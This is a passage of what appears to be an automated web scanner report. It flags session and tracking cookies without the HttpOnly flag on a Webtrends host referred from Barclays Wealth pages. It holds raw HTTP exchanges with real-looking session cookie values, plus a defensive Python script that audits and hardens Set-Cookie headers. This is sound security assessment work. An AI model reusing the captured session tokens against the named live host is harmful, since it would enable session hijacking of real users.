Set-Cookie: JSESSIONID=27DB104FF240B21CA30EC91928AC60D3; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e93201f611e1; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; Expires=Sun, 01-Jan-2012 00:03:06 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.37. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d92
76d3f81d9620a28d093d33704eb82ccdfef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392deb9e91585f035b3a35cd925087e761247a6fade9720dc2253cb41cf81885470770d955ab4acb239f14bfe72a4ddb25c56203f36663201e127f7abd60b0392424be18baebafe451e1f63305b9c721ab72a4f74205059da3f3e4d19602a7225fc98746eae27270322364a9f84488ce4e91ae6a939ffedaac315747c9771ba2317479c1dd3522b852064815ef645eae714a67f92f1921145aa35e9969c917e3a6ebf92c40e9f7d28cc04e8342ff3ffd2a1b9ff93d33774ca86c470dcb92ad9fd92936a0fb8345836e22c11737f2cc991681ac289d7e5302fb55bd9d0f76da89a7890bd6a1a5116a365bcd8654f218c63164de43662abdab3dd6e7bdc7b26cc44bea6d25e04c03fa5d1c6d8d9ced6e153dbe12d125489453b4b100a75e9bf11a679acf19bb2165a14fcba51ffd079714c50820e47d59b96dcb598e652bfceb7a9e07ae5d813450463c1ecda4d2e9d53971c4e5a18dda87fad8acb7133744e9c1cdd1941e797c935a3347970fca5b173a67b9388c0df5e9a5f643b2270f55e16f75083e249b3213372a2ce9ff3c25c571635b2a067c7d42ded35998dabcb622b251729c2aa76f1b4d7a3cebe7ec6451594512ed7f87e2c7f243d24d019d8c7e13ad44c44e08af75ffcf03cca073ac88e6695f4f67e671f3ac1a796a5370cd913d1849836ac9f1f23aa297a1ab08da6ba0130026547dd8c1170f58565beab11e480e81e48d450243bfe5b61dd253e4431988cdeac8b0645d2e13b24a932e0f7935ad5ee0299184ad98013035f80ecc4cd6d5beb6c2766a03640af7cf08981f57f2aed80cb49ba973888da08d2c425aa8007e717b426d0c37ea7fa07ab55e8f101f6a32c829c82219c00b418d227c466ce5527499081d588fdfc201a24f82f44ba1b6d2fff9784cb56fcd9dbd32d27e68119df750079367005de70b577fe2f5408cb8a5f156bd582e6cc643159002e488b9ceed902c63b7b84a4a9d9276d3f81d9620a28d093d33704eb82ccd
fef7d42de37d6a36441761954b1d4e12d19d91b2673122d399135a883a1bb889d27634308f762549a9f88297f61d25938a71c3d7d8216b2f5483ea58e018de7299fe1cf1a0489140fea591a58201a567a3c1948f8518f9db1ffe2faa1599886c3aba43e1d54c8742af6afde943e5bd6813debe2715b17647cfaa8229a10b8657bc222c6abfb504dd7a1610a568cc4de9e7828d9eac55c202462abf6a77a63cceb61d5764797fdf126fd2b1e22b72e30cc097b48908cd6f4ff0aecc93cd74add7247d3f4add823266d05dfe655f27243a2d7e151860781e1b56718d16e3a3d5173c463904e857fd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: JSESSIONID, _wt.mode-79569 and _wt.user-79569 (see the Set-Cookie headers in the response below). The highlighted cookie, JSESSIONID, appears to contain a session token, which may increase the risk associated with this issue: without HttpOnly, any script running in the page (for example via a cross-site scripting flaw) can read the token through document.cookie. Review the contents of the cookies to determine their function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/important-information.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DE896946856589AC32A1D6B5BBB2DDE9; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a04d7d1af; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d0406738a; _wt.mode-79569=fcdcc722e93204194090

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:17 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e932043ee114; Path=/
Set-Cookie: _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00bb0854; Expires=Sun, 01-Jan-2012 00:03:17 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
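As an added example (not part of this report and not code from the Webtrends product), the following Python script applies the same check to a raw HTTP response: it parses every Set-Cookie header, reports cookies that lack HttpOnly (and Secure when the response was served over TLS), flags cookie names that usually carry a session token, and shows how a fronting proxy could rewrite the header. The sample response is constructed from the 14.37 response headers with cookie values shortened; the session-name list and the `harden_set_cookie` helper are assumptions of this example, not scanner behaviour.

```python
"""Audit Set-Cookie headers for missing HttpOnly / Secure attributes.

Added example for this report. SAMPLE_RESPONSE is constructed from the
headers in finding 14.37 (cookie values shortened); SESSION_NAME_HINTS
and harden_set_cookie() are assumptions, not scanner logic.
"""
import re
from typing import Dict, List, Tuple

# Names that usually carry a session token (assumption, not from the scanner).
SESSION_NAME_HINTS = ("JSESSIONID", "PHPSESSID", "ASP.NET_SESSIONID", "SESSION", "SID")

# Constructed sample based on the 14.37 response; values shortened.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    "X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n"
    "Set-Cookie: JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; Path=/ots\r\n"
    "Set-Cookie: _wt.mode-79569=fcdcc722e932043ee114; Path=/\r\n"
    "Set-Cookie: _wt.user-79569=e991d63afa2c45; Expires=Sun, 01-Jan-2012 00:03:17 GMT; Path=/\r\n"
    "Content-Length: 44561\r\n"
    "\r\n"
    "/** body omitted */\r\n"
)


def parse_set_cookies(raw_response: str) -> List[Tuple[str, str, Dict[str, str]]]:
    """Return (name, value, attributes) for every Set-Cookie header.

    Attribute names are lower-cased; flag attributes such as HttpOnly map to ''.
    Only the header block (everything before the first blank line) is read.
    """
    head = raw_response.split("\r\n\r\n", 1)[0]
    cookies: List[Tuple[str, str, Dict[str, str]]] = []
    for line in head.split("\r\n"):
        field, sep, value = line.partition(":")   # split on the first colon only
        if not sep or field.strip().lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";") if p.strip()]
        name, _, val = parts[0].partition("=")
        attrs: Dict[str, str] = {}
        for attr in parts[1:]:
            k, _, v = attr.partition("=")
            attrs[k.strip().lower()] = v.strip()
        cookies.append((name.strip(), val.strip(), attrs))
    return cookies


def looks_like_session_token(name: str) -> bool:
    """Name-based heuristic (assumption): does this cookie usually hold a session id?"""
    upper = name.upper()
    return any(hint in upper for hint in SESSION_NAME_HINTS)


def audit(raw_response: str, over_https: bool = False) -> List[dict]:
    """One finding per cookie that lacks HttpOnly (and Secure, when served over TLS)."""
    findings = []
    for name, _value, attrs in parse_set_cookies(raw_response):
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if over_https and "secure" not in attrs:
            missing.append("Secure")
        if missing:
            findings.append({
                "cookie": name,
                "missing": missing,
                "session_like": looks_like_session_token(name),
            })
    return findings


def harden_set_cookie(header_value: str, over_https: bool = False) -> str:
    """Rewrite one Set-Cookie value so HttpOnly (and Secure on TLS) are present.

    Meant for a reverse proxy in front of a container that cannot set the flag
    itself; existing attributes are kept and nothing is duplicated.
    """
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    present = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
    if "httponly" not in present:
        parts.append("HttpOnly")
    if over_https and "secure" not in present:
        parts.append("Secure")
    return "; ".join(parts)


if __name__ == "__main__":
    for finding in audit(SAMPLE_RESPONSE):
        tag = " (session token?)" if finding["session_like"] else ""
        print(f"{finding['cookie']}: missing {', '.join(finding['missing'])}{tag}")
    print(harden_set_cookie("JSESSIONID=A03C4F80BFCFBF92FCB64700ED6E25D0; Path=/ots"))
```

The X-Powered-By header in these responses advertises Servlet 2.5 on JBossWeb 2.1. `Cookie.setHttpOnly()` only exists from Servlet 3.0 onward, so on that stack the flag on the container-issued JSESSIONID has to come from container configuration or from a fronting proxy rewrite like `harden_set_cookie`, not from application code.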

14.38. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue, since without HttpOnly any script running in the page can read it through document.cookie. Review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:08 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.39. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040957a5dc4044909cae61afa1b86f68ca755f466533d6d9c80442400e6d7eb0ad62c8e96f5952759fe24f09ca0f15b409ee09d35f106fda52ad4acb239f08b1920917fa29f9295df334353d005c0f24f948ae762a20be0f89e8a1fe04a8b50825ff84219b7afdbc15570983bef1e187c647eb275fd4814efbf83f2467694080856af0ad79bb8754b6a5ebc0f5794d75bd1a65c349420faab94819bb47071e19bd795cb3751233fe6011264809ba1ec67fdc0895b4f6ba583dcca794e79308d71daf6dbf0066f489312564608b6b1120ce83be9cc026368fddb96a885b1efa484abb9ac95bdcf741c03e1044900be3c65667d585a6800fdeb5bc072e690991f105b3489b3d6ecc07247df4ab629ddeb8f5f96dd446ba7a30ad0b40a65d0a6db7faa12b1c6aaf49957554c656b0b75ea25991a7102ac9ca4bb4223ea940c3a402fe039f16c10378bf205ea63acd0b8f6225f6b671cb4ffe489c723b2e785b91f1c1e0943c6893b0ec858c99fe89ffb4103a4fb4cac9cade584745d1193811d40c890b54772087519f1aaef7b3a900e63a0c51e86a7603302fc23c0d31657ffeb9297c9f3572416440143f05939e1ccecba7b929b401728c20b03b14457f61bbb2ef33035c1042bc7ad7e690aa47d84d5699d77e46ac45974806a57eaec20fc9f02aa9d9b13d0c423db170a0fa462f6d0227cec13a4e47d36bcbf7a23af7c6f3ef409b0db1571b2759279a874a0646535bb9e346034dd7dd89157a52aee8ae36dc12d1544a9ccbceebbb75553b4eb945907a092a68f80fb2299f83fa9f093637f9559e1ed3dfbcbd90706f006c0ef49f529e1954a6a0db0dbf98f7728a8bf6887d140ea60c2e2727433c0030b177fb2eb40bda1145306d9a20c97847940915d972774c6ee10f28c55e4e5c8d88c706a64386f61af2e0d0fdfe2b56fb2ca0d3fb7987773153dcf90449923a500dea1112278ff412f5f1e4a91d90016e0d8b11069474c5dfafc5fdc4266fb3bf471ac8c722d3fe129124a7880d3e6b7a1de879cc
aca78129e07a3e30461530914c1c1a08cf8afca02b7c7c899c45428d6516b683c7752464d527251aa6fd81c3ac1674c0837391d085706f3b4a90d83f8c3db90882a10daff75ede06c59cd1b4dd05b03ce7c3dc8b8c4ba9d113ff79ab40808f6c6ab515ee8811d940b66af7ea44b3bc681ad2ba6a12b57549cdf08d26fa049c57ac3f3d00d5a448d2280418b43dda4fedff8788d2fc559600162bb5317ea17bd0f0723c213b258f0834d2ace25827c87dd88cbd9607c0744be8a6dd98d827f78a7f263e56dec93a7b9719a7371561367e602100c720c5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue, since without HttpOnly any script running in the page can read it through document.cookie. Review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/i-alert.htm?WT.mc_id=int_q3_ialert_bwi&WT.mc_ev=click
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=9EE5E42568221972B90415F936FA1D9A; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a031a36ee; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02420171; _wt.mode-79569=fcdcc722e93200db2e76

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:31:31 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6470427122C0BC6EEE06A97043357700; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.40. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.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

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue, since without HttpOnly any script running in the page can read it through document.cookie. Review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking/products-services/investment-management.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A41F4D7EB85977B26917F3C61E7ED309; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a059683f7; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d030fc451; _wt.mode-79569=fcdcc722e932031ed775

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D04074B23F5A36B7B29BA0731F53ABEE; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...

14.41. http://ots.optimize.webtrends.com/ots/ots/js-3.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

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776af9271f153863f09fd35a5417533339979f0989b728624c6cedd54716cb6e1ba617a951d33a4a30b430f4179e5cc942e0a0291bad6794710fe13e27645e557c77a978a87c2f20bf59ecf1f4c762dbc40b3085ac049153d4f8171659d7b5a2b8888e52ab771d8adb43fba67f7b287b3df4ea08c5da199cf837c2ccb9daac685025cb0a64d432697beef82a18ac1c00095afd3833c4163d5a9e477b444360fd489d2990598cfeaeec6a2bfba18bd8d4408349e42ef75a0c87ec494e1e14ec0a114a93c7efd8996745c5daa47ca56d14e14700a382da169aba12d726052dd351fc8710319286a1890ad8aeb21f7f6556da8604f118927935dc10623da6ef7e8bb8aeb8b47a9140f06165a50946a84c0278ebf6a928193ff919c27253c654b7b70bf75ecba0487e9a981cbb256da940c2a052f803c04793087fec700df568ce5c8b3521f7ea24cc48f9489a703a78700bc1a791b6963e3996e2eb888fc8aed8afb71e3c4be3cec892800c114284176d45810cdf090d7421d152ca1aa0a5b4af57bb3b0d00e96a7004362a92300460627ff6b97f7ec266234f3247426f05939318c590f2e22be351728729e33e1b402960bbe0eb6705531f47eb2c84eb96af15dd1a02c88d7f44ff45911c0fa472fcd41adfcd65bbc3b437570e76bf2fe9a8467f3f0c3c8ec1061d4ff32b88aaba47aed4c5b909c96087615b660c6b8bcc1c5b085150e9b0191d5b81b68e170a13bfbdee4ed655bb411c88cce99ce5615f2f48b44a977c042a38af0cb9289b82ad9f0d3530f8549b4cdad4efb7c126390d6b09f5ca09c94c5ba5a8dc00ebcff92388dba4882b1151a7512e272d456d5d61b472a62be00dd84f153561c4729d7218945a118e20724c6cee5527c4081f5b8eda9a50f015dbfd4ef1b3d5f8af2c57ae2ea4ddaa2585203454dcad094e9c3c055bec1547268ef647f9fdb7fc1c96023c0781455493269482abc5f990246cb5bf5d54daa86794b447cd72f4910f653f7f41ff26d6
f9a7d47be67f6832111831934d18491d809b90e27d7e33b1ac7f29ea1f01ba988c2b242e941c190ce5a2d284af0777de8226c2d3d8726a2a5181a15ae04ade7e99a217fea552c317abf491f9895caa30ebc3c18b8a4fa1d01ef47cb2428c927d04dd55a3dc4bc34cba6aeaea47a8b4610cdbbf7514b37d47c0f1823cee10ed39fb67723ca8eb1e8e680a00c953810ab6ab9482defc4896041225b9307faf61cafc1c4d65613d98476d83efe20978ea01a848e2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: JSESSIONID (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue, since without HttpOnly any script running in the page can read it through document.cookie. Review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.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 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
